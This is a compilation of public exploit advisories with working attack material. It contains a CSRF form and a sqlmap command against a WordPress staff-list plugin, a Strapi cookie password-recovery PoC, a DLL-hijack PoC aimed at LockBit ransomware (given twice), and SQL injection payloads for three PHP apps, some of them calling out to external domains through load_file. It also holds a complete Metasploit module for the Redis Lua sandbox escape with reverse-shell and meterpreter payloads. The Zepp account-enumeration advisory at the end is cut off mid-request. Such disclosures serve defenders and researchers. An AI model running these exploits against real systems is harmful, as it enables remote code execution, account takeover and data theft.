<pre><code># Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)<br /># Date: 05-02-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/stafflist/<br /># Version: 3.1.2<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Summary:<br /><br />A CSRF vulnerability exists in staff record remove functionality in<br />WordPress Plugin Stafflist 3.1.2.<br /><br />This vulnerability allows an attacker to delete existing records by<br />triggring a CSRF html request, due to not validating wp_nouce token in<br />the request.<br /><br /># Exploit<br /><br />As n authenticated user:<br /><br /><html><br /> <body><br /> <form action="http://localhost:10003/wp-admin/admin.php"><br /> <input type="hidden" name="page" value="stafflist" /><br /> <input type="hidden" name="remove" value="1" /><br /> <input type="hidden" name="p" value="1" /><br /> <input type="hidden" name="s" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection<br />(Authenticated)<br /># Date: 05-02-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/stafflist/<br /># Version: 3.1.2<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable Code:<br /><br />$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?<br />...<br /> $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR<br /> LOWER(firstname) LIKE '%{$w}%' OR<br /> LOWER(department) LIKE '%{$w}%' OR<br /> LOWER(email) LIKE '%{$w}%'" : "");<br /><br /><br /># Vulnerable URL<br /><br />http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]<br /><br /># POC<br /><br />```<br />sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'<br />--cookie="wordpress_cookies_paste_here"<br />```<br /><br /># POC Image<br /><br />https://prnt.sc/AECcFRHhe2ib<br /></code></pre>
<pre><code># Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format<br /># Google Dork: intitle:"Welcome to your Strapi ap"<br /># Shodan search: "X-Powered-By: Strapi <strapi.io>"<br /># Date: 2022-03-30<br /># Exploit Author: Kitchaphan Singchai [idealphase]<br /># Vendor Homepage: https://strapi.io/<br /># Software Link: https://github.com/strapi/strapi/releases<br /># Vulnerable Version: < 3.6.9 and < 4.1.5<br /># Version: 3.6.8<br /># Tested on: Linux<br /># CVE: CVE-2021-46440<br /><br /># Description:<br />Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.<br /><br /># This CVE has been fixed via this Github pull request.<br />- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)<br /><br /># PoC:<br />[Request]<br />POST /documentation/login HTTP/1.1<br />Host: 127.0.0.1:1337<br />..[SNIP]..<br /><br />password=password<br /><br />[Response]<br />HTTP/1.1 302 Found<br />Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly<br />Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly<br />X-Powered-By: Strapi <strapi.io><br />..[SNIP]..<br /><br />Redirecting to <a href="/documentation">/documentation</a>.<br /><br />Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.<br />{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}<br /><br /># Timeline:<br />19/Jan/2022 - Inform vulnerability to Strapi team<br />20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.<br />8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)<br />28/Mar/2022 - Reserved CVE-2021-46440<br />29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/96de05212b30ec85d4cf03386c1b84af.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.LockBit<br />Vulnerability: DLL Hijacking<br />Description: LockBit ransomware looks for and executes DLLs in its current directory. This can potentially allow us to execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. All basic tests were conducted successfully in a virtual machine environment.<br />Family: LockBit<br />Type: PE32<br />MD5: 96de05212b30ec85d4cf03386c1b84af<br />Vuln ID: MVID-2022-0572<br />Disclosure: 05/02/2022<br />Video PoC URL: https://www.youtube.com/watch?v=3i6tv4cpfSc<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll"<br />2) Place the DLL in same directory as Lockbit ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run Lockbit PE file<br /><br />#include "windows.h"<br />#include "stdio.h"<br /><br />//By malvuln - 5/1/2022<br />//Vuln: DLL Hijacking<br />//Target: Lockbit Ransomware<br />//MD5: 96de05212b30ec85d4cf03386c1b84af<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> //printf("Current directory: %s\n", buf);<br /> //check the path, netapi32.dll is sideloaded by lockbit<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Covid 19 Travel Pass Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.01.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management<br /><br />## Description:<br />The `code` parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+'<br />was submitted in the code parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator accounts control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: code (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />OR NOT 7325=7325 AND 'vRQn'='vRQn<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />AND (SELECT 1607 FROM(SELECT COUNT(*),CONCAT(0x7171707071,(SELECT<br />(ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'='HjrM<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'='bdqR<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 10 columns<br /> Payload: page=view_pass&code=775545'+(select<br />load_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+''<br />UNION ALL SELECT<br />NULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/huye3b)<br /></code></pre>
<pre><code>## Title: Toll Tax Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.07.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(select<br />load_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+''<br />ELSE 0x28 END)) AND 'XhmU'='XhmU<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />OR (SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT<br />(ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'='CIPJ<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'='XHBJ<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 6 columns<br /> Payload: id=1'+(select<br />load_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''<br />UNION ALL SELECT<br />CONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/y9xo4q)<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/96de05212b30ec85d4cf03386c1b84af.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.LockBit<br />Vulnerability: DLL Hijacking<br />Description: LockBit ransomware looks for and executes DLLs in its current directory. This can potentially allow us to execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. All basic tests were conducted successfully in a virtual machine environment.<br />Family: LockBit<br />Type: PE32<br />MD5: 96de05212b30ec85d4cf03386c1b84af<br />Vuln ID: MVID-2022-0572<br />Disclosure: 05/02/2022<br />Video PoC URL: https://www.youtube.com/watch?v=3i6tv4cpfSc<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll"<br />2) Place the DLL in same directory as Lockbit ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run Lockbit PE file<br /><br />#include "windows.h"<br />#include "stdio.h"<br /><br />//By malvuln - 5/1/2022<br />//Vuln: DLL Hijacking<br />//Target: Lockbit Ransomware<br />//MD5: 96de05212b30ec85d4cf03386c1b84af<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> //printf("Current directory: %s\n", buf);<br /> //check the path, netapi32.dll is sideloaded by lockbit<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Home Clean Service System v1.0 - 2022 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.27.2022<br />## Vendor: https://www.sourcecodester.com/users/acetech<br />## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System<br /><br />## Description:<br />The `password` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the password parameter, and a database<br />error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br />The attacker can take administrator account control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: MULTIPART email ((custom) POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="email"<br />uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="password"<br /><br />t8I!x2y!H3'<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="login"<br /><br /><br />------WebKitFormBoundary8kMPLwTOJeesgEBx--<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="email"<br />uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT<br />COUNT(*),CONCAT(0x7176716271,(SELECT<br />(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="password"<br /><br />t8I!x2y!H3'<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="login"<br /><br /><br />------WebKitFormBoundary8kMPLwTOJeesgEBx--<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="email"<br />uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM<br />(SELECT(SLEEP(5)))kgBM)-- GxTm<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="password"<br /><br />t8I!x2y!H3'<br />------WebKitFormBoundary8kMPLwTOJeesgEBx<br />Content-Disposition: form-data; name="login"<br /><br /><br />------WebKitFormBoundary8kMPLwTOJeesgEBx--<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/l107o6)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::CmdStager<br /> include Msf::Auxiliary::Redis<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Redis Lua Sandbox Escape',<br /> 'Description' => %q{<br /> This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The<br /> vulnerability was introduced by Debian and Ubuntu Redis packages that<br /> insufficiently sanitized the Lua environment. The maintainers failed to<br /> disable the package interface, allowing attackers to load arbitrary libraries.<br /><br /> On a typical `redis` deployment (not docker), this module achieves execution<br /> as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the<br /> "MemoryDenyWriteExecute" permission, which limits some of what an attacker can<br /> do. For example, staged meterpreter will fail when attempting to use mprotect.<br /> As such, stageless meterpreter is the preferred payload.<br /><br /> Redis can be configured with authentication or not. This module will work with<br /> either configuration (provided you provide the correct authentication details).<br /> This vulnerability could theoretically be exploited across a few architectures:<br /> i386, arm, ppc, etc. However, the module only supports x86_64, which is likely<br /> to be the most popular version.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Reginaldo Silva', # Vulnerability discovery and PoC<br /> 'jbaines-r7' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2022-0543' ],<br /> [ 'URL', 'https://www.lua.org/pil/8.2.html'],<br /> [ 'URL', 'https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce' ],<br /> [ 'URL', 'https://www.debian.org/security/2022/dsa-5081' ],<br /> [ 'URL', 'https://ubuntu.com/security/CVE-2022-0543' ]<br /> ],<br /> 'DisclosureDate' => '2022-02-18',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'Payload' => {<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'wget'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'MeterpreterTryToFork' => true,<br /> 'RPORT' => 6379<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('LUA_LIB', [true, 'LUA library path', '/usr/lib/x86_64-linux-gnu/liblua5.1.so.0']),<br /> OptString.new('PASSWORD', [false, 'Redis AUTH password', 'mypassword'])<br /> ])<br /> end<br /><br /> # See https://github.com/rapid7/metasploit-framework/pull/13143<br /> def has_check?<br /> true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis<br /> end<br /><br /> # Use popen to execute the desired command and read back the output. This<br /> # is how the original PoC did it.<br /> def do_popen(cmd)<br /> exploit = "eval '" \<br /> "local io_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_io\"); " \<br /> 'local io = io_l(); ' \<br /> "local f = io.popen(\"#{cmd}\", \"r\"); " \<br /> 'local res = f:read("*a"); ' \<br /> 'f:close(); ' \<br /> "return res' 0" \<br /> "\n"<br /> sock.put(exploit)<br /> sock.get(read_timeout)<br /> end<br /><br /> # Use os.execute to execute the desired command. This doesn't return any output, and likely<br /> # isn't meaningfully more useful than do_open but I wanted to demonstrate other execution<br /> # possibility not demonstrated by the original poc.<br /> def do_os_exec(cmd)<br /> exploit = "eval '" \<br /> "local os_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_os\"); " \<br /> 'local os = os_l(); ' \<br /> "local f = os.execute(\"#{cmd}\"); " \<br /> "' 0" \<br /> "\n"<br /><br /> sock.put(exploit)<br /> sock.get(read_timeout)<br /> end<br /><br /> def check<br /> connect<br /><br /> # Before we get crazy sending exploits over the wire, let's just check if this could<br /> # plausiably be a vulnerable version. Using INFO we can check for:<br /> #<br /> # 1. 4 < Version < 6.1<br /> # 2. OS contains Linux<br /> # 3. redis_git_sha1:00000000<br /> #<br /> # We could probably fingerprint the build_id as well, but I'm worried I'll overlook at<br /> # package somewhere and it's nice to get final verification via exploitation anyway.<br /> info_output = redis_command('INFO')<br /> return Exploit::CheckCode::Unknown('Failed authentication.') if info_output.nil?<br /> return Exploit::CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'<br /> return Exploit::CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'<br /><br /> redis_version = info_output[/redis_version:(?<redis_version>\S+)/, :redis_version]<br /> return Exploit::CheckCode::Safe('Could not extract a version number') if redis_version.nil?<br /> return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')<br /> return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')<br /> return Exploit::CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'<br /><br /> # okay, looks like a worthy candidate. Attempt exploitation.<br /> result = do_popen('id')<br /> return Exploit::CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?<br /><br /> Exploit::CheckCode::Safe("Could not execute 'id' on the remote target.")<br /> ensure<br /> disconnect<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> connect<br /><br /> # force the redis mixin to handle auth for us<br /> info_output = redis_command('INFO')<br /> fail_with(Failure::NoAccess, 'The server did not respond') if info_output.nil?<br /><br /> # escape any single quotes<br /> cmd = cmd.gsub("'", "\\\\'")<br /><br /> # On success, there is no meaningful response. I think this is okay because we already have<br /> # solid proof of execution in check.<br /> resp = do_os_exec(cmd)<br /> fail_with(Failure::UnexpectedReply, "The server did not respond as expected: #{resp}") unless resp.nil? || resp.include?('$-1')<br /> print_good('Exploit complete!')<br /> ensure<br /> disconnect<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Trovent Security Advisory 2108-02 #<br />#####################################<br /><br /><br />User account enumeration in password reset function<br />###################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2108-02<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2108-02<br />Affected product: Zepp Android mobile application (com.huami.watch.hmwatchmanager)<br />Tested versions: Zepp 6.1.4-play<br />Vendor: Huami Inc., https://www.zepp.com<br />Credits: Trovent Security GmbH, Karima Hebbal<br /><br /><br />Detailed description<br />####################<br /><br />Zepp is a mobile application to collect health information from Zepp or Amazfit<br />devices.<br />Trovent Security GmbH discovered a user account enumeration vulnerability in<br />the password reset function of the Zepp mobile application.<br />This vulnerability allows to check if a user with a specific email address is<br />registered or not.<br /><br />Severity: Medium<br />CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CWE ID: CWE-204<br />CVE ID: N/A<br /><br /><br />Proof of concept<br />################<br /><br />Sample HTTP request sent with a registered email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />DELETE /registrations/ptesttest33%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2<br />Host: api-user.huami.com<br />App_name: com.huami.midong<br />Accept-Language: en-US<br />X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)<br />Accept-Encoding: gzip, deflate<br />Content-Length: 0<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />The server response to a valid email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP/2 202 Accepted<br />Date: Mon, 30 Aug 2021 12:38:52 GMT<br />Content-Type: application/json<br />Content-Length: 39<br />Vary: Origin<br />Vary: Access-Control-Request-Method<br />Vary: Access-Control-Request-Headers<br /><br />"HuaMi Oauth / User Registration 2.0.2"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Sample HTTP request sent with a non-registered email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />DELETE /registrations/false%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2<br />Host: api-user.huami.com<br />App_name: com.huami.midong<br />Accept-Language: en-US<br />X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 